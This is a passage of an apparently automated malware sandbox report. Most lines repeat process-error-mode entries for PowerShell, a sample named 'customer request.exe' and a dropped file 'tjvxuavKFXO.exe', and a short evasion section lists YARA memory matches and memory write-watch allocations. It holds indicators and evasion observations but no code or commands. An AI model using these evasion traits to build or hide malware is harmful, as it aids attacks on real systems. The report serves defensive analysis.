            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 1390000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 97B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 7810000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: A7B0000 memory reserve | memory write watchJump to behavior
